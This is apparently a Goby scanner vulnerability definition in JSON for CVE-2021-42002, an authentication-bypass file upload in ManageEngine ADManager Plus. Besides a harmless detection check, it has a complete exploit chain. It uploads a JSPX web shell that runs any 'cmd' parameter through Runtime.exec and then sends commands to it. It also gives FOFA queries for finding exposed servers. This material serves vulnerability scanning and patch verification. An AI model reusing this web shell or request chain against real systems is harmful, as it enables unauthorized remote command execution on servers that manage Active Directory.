mirror of https://github.com/qwqdanchun/Goby.git
222 lines
10 KiB
JSON
222 lines
10 KiB
JSON
{
|
||
"Name": "ManageEngine ADManager Plus File upload vulnerability(CVE-2021-42002)",
|
||
"Description": "<p><span style=\"color: rgb(68, 68, 68);\"><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">ManageEngine ADManager Plus is </span>An Active Directory (AD) management and reporting solution that allows IT administrators and technicians to manage AD objects easily and generate instant reports at the click of a button!<br></span></p><p><span style=\"color: rgb(68, 68, 68); font-size: medium;\">ManageEngine ADManager Plus <7114 Filter bypass leading to file-upload remote code execution,this <span style=\"color: rgb(54, 71, 79);\">vulnerability has been fixed and released in version </span><strong style=\"color: rgb(54, 71, 79);\">7115</strong></span><br></p>",
|
||
"Product": "ManageEngine ADManager Plus",
|
||
"Homepage": "https://www.manageengine.com/",
|
||
"DisclosureDate": "2021-11-11",
|
||
"Author": "Flip_FI",
|
||
"FofaQuery": "app=\"ManageEngine-ADManager-Plus\" || title=\"ManageEngine - ADManager Plus\"",
|
||
"GobyQuery": "app=\"ManageEngine-ADManager-Plus\" || title=\"ManageEngine - ADManager Plus\"",
|
||
"Level": "3",
|
||
"Impact": "<p>The attacker can bypass the permission and directly upload the Trojan horse jspx file, and can remotely execute any system command to obtain the server permission, which is a great risk<br></p>",
|
||
"Recommendation": "<p><span style=\"color: var(--primaryFont-color);\">The vendor has released a bug fix, please pay attention to the update in time:<span style=\"color: rgb(22, 51, 102); font-size: 16px;\"><a href=\"https://www.manageengine.com/products/ad-manager/release-notes.html#7115\">https://www.manageengine.com/products/ad-manager/release-notes.html#7115</a></span></span><br></p>",
|
||
"References": [
|
||
"https://www.manageengine.com/products/ad-manager/release-notes.html#7115"
|
||
],
|
||
"Is0day": false,
|
||
"HasExp": true,
|
||
"ExpParams": [
|
||
{
|
||
"name": "cmd",
|
||
"type": "input",
|
||
"value": "whoami",
|
||
"show": ""
|
||
}
|
||
],
|
||
"ExpTips": {
|
||
"Type": "",
|
||
"Content": ""
|
||
},
|
||
"ScanSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"method": "POST",
|
||
"uri": "/;AAA/MobileAPI/WC/PasswordExpiryNotification?operation=fileAttachment",
|
||
"follow_redirect": false,
|
||
"header": {
|
||
"Content-Type": "multipart/form-data; boundary=---------------------------18496892720832008743187564073"
|
||
},
|
||
"data_type": "text",
|
||
"data": "-----------------------------18496892720832008743187564073\nContent-Disposition: form-data; name=\"UPLOADED_FILE\"; filename=\"1.jspx\"\r\nContent-Type: text/plain\r\n\r\n<jsp:root xmlns:jsp=\"http://java.sun.com/JSP/Page\" xmlns=\"http://www.w3.org/1999/xhtml\" xmlns:c=\"http://java.sun.com/jsp/jstl/core\" version=\"2.0\">\n<jsp:directive.page contentType=\"text/html;charset=UTF-8\" pageEncoding=\"UTF-8\"/>\n<jsp:directive.page import=\"java.util.*\"/>\n<jsp:directive.page import=\"java.io.*\"/>\n<jsp:scriptlet><![CDATA[\n\tout.println(\"c4ca4238a0b923820dcc509a6f75849b\");\n\t]]></jsp:scriptlet>\n</jsp:root>\r\n-----------------------------18496892720832008743187564073--"
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "SUCCESS",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": [
|
||
"file|lastbody|regex|([0-9_.a-z]+.jspx)"
|
||
]
|
||
},
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/ompemberapp/PasswordExpiryNotification/{{{file}}}",
|
||
"follow_redirect": true,
|
||
"header": {},
|
||
"data_type": "text",
|
||
"data": ""
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "c4ca4238a0b923820dcc509a6f75849b",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": []
|
||
}
|
||
],
|
||
"ExploitSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"method": "POST",
|
||
"uri": "/;AAA/MobileAPI/WC/PasswordExpiryNotification?operation=fileAttachment",
|
||
"follow_redirect": true,
|
||
"header": {
|
||
"Content-Type": "multipart/form-data; boundary=---------------------------18496892720832008743187564073"
|
||
},
|
||
"data_type": "text",
|
||
"data": "-----------------------------18496892720832008743187564073\nContent-Disposition: form-data; name=\"UPLOADED_FILE\"; filename=\"1.jspx\"\r\nContent-Type: text/plain\r\n\r\n<jsp:root xmlns:jsp=\"http://java.sun.com/JSP/Page\" xmlns=\"http://www.w3.org/1999/xhtml\" xmlns:c=\"http://java.sun.com/jsp/jstl/core\" version=\"2.0\">\n<jsp:directive.page contentType=\"text/html;charset=UTF-8\" pageEncoding=\"UTF-8\"/>\n<jsp:directive.page import=\"java.util.*\"/>\n<jsp:directive.page import=\"java.io.*\"/>\n<jsp:scriptlet><![CDATA[\n\tString cmd = pageContext.getRequest().getParameter(\"cmd\");\n\tif (cmd != null&&!\"\".equals(cmd)) {\n\ttry{\n\t\tProcess p = Runtime.getRuntime().exec(cmd);\n\t\tInputStream in = p.getInputStream();\n\t\tBufferedReader br = new BufferedReader(new InputStreamReader(in,\"GBK\"));\n\t\tString brs = br.readLine();\n\t\twhile(brs!=null){\n\t\t\tout.println(brs+\"</br>\");\n\t\t\tbrs = br.readLine();\n\t\t}\n\t\t}catch(Exception ex){\n\t\t\tout.println(ex.toString());\n\t\t}\n\t}]]></jsp:scriptlet>\n</jsp:root>\r\n-----------------------------18496892720832008743187564073--"
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "SUCCESS",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": [
|
||
"file|lastbody|regex|([0-9_.a-z]+.jspx)"
|
||
]
|
||
},
|
||
{
|
||
"Request": {
|
||
"method": "POST",
|
||
"uri": "/ompemberapp/PasswordExpiryNotification/{{{file}}}",
|
||
"follow_redirect": true,
|
||
"header": {
|
||
"Content-Type": "application/x-www-form-urlencoded"
|
||
},
|
||
"data_type": "text",
|
||
"data": "cmd={{{cmd}}}"
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": [
|
||
"output|lastbody|regex|([\\w\\W]+)"
|
||
]
|
||
}
|
||
],
|
||
"Tags": [
|
||
"Code Execution",
|
||
"File Upload"
|
||
],
|
||
"VulType": [
|
||
"Code Execution",
|
||
"File Upload"
|
||
],
|
||
"CVEIDs": [
|
||
"CVE-2021-42002"
|
||
],
|
||
"CNNVD": [
|
||
"CNNVD-202111-1073"
|
||
],
|
||
"CNVD": [
|
||
"CNVD-2021-88234 "
|
||
],
|
||
"CVSSScore": "9.8",
|
||
"Translation": {
|
||
"CN": {
|
||
"Name": "ManageEngine ADManager Plus 任意文件上传漏洞(CVE-2021-42002)",
|
||
"Product": "ManageEngine ADManager Plus",
|
||
"Description": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">ManageEngine ADManager Plus 是Zoho公司开发的</span>一个 Active Directory (AD) 管理和报告解决方案,它允许 IT 管理员和技术人员轻松管理 AD 对象并单击按钮生成即时报告!</p><p><span style=\"color: var(--primaryFont-color);\">ManageEngine ADManager Plus <= 7114 存在权限绕过漏洞,导致未授权用户允许上传JSPX文件至网站目录,达到任意代码执行目的。</span></p>",
|
||
"Recommendation": "<p><span style=\"color: var(--primaryFont-color);\">厂商已发布了漏洞修复程序,请及时关注更新:<a href=\"https://www.manageengine.com/products/ad-manager/release-notes.html#7115\">https://www.manageengine.com/products/ad-manager/release-notes.html#7115</a></span><br></p>",
|
||
"Impact": "<p><span style=\"font-size: medium;\"><span style=\"color: rgb(22, 51, 102);\">攻击者通过权限绕过直接上传木马jspx文件,可远程执行任意系统命令获取服务器权限,风险极大</span></span></p>",
|
||
"VulType": [
|
||
"代码执⾏",
|
||
"⽂件上传"
|
||
],
|
||
"Tags": [
|
||
"代码执⾏",
|
||
"⽂件上传"
|
||
]
|
||
},
|
||
"EN": {
|
||
"Name": "ManageEngine ADManager Plus File upload vulnerability(CVE-2021-42002)",
|
||
"Product": "ManageEngine ADManager Plus",
|
||
"Description": "<p><span style=\"color: rgb(68, 68, 68);\"><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">ManageEngine ADManager Plus is </span>An Active Directory (AD) management and reporting solution that allows IT administrators and technicians to manage AD objects easily and generate instant reports at the click of a button!<br></span></p><p><span style=\"color: rgb(68, 68, 68); font-size: medium;\">ManageEngine ADManager Plus <7114 Filter bypass leading to file-upload remote code execution,this <span style=\"color: rgb(54, 71, 79);\">vulnerability has been fixed and released in version </span><strong style=\"color: rgb(54, 71, 79);\">7115</strong></span><br></p>",
|
||
"Recommendation": "<p><span style=\"color: var(--primaryFont-color);\">The vendor has released a bug fix, please pay attention to the update in time:<span style=\"color: rgb(22, 51, 102); font-size: 16px;\"><a href=\"https://www.manageengine.com/products/ad-manager/release-notes.html#7115\">https://www.manageengine.com/products/ad-manager/release-notes.html#7115</a></span></span><br></p>",
|
||
"Impact": "<p>The attacker can bypass the permission and directly upload the Trojan horse jspx file, and can remotely execute any system command to obtain the server permission, which is a great risk<br></p>",
|
||
"VulType": [
|
||
"Code Execution",
|
||
"File Upload"
|
||
],
|
||
"Tags": [
|
||
"Code Execution",
|
||
"File Upload"
|
||
]
|
||
}
|
||
},
|
||
"AttackSurfaces": {
|
||
"Application": null,
|
||
"Support": null,
|
||
"Service": null,
|
||
"System": null,
|
||
"Hardware": null
|
||
}
|
||
} |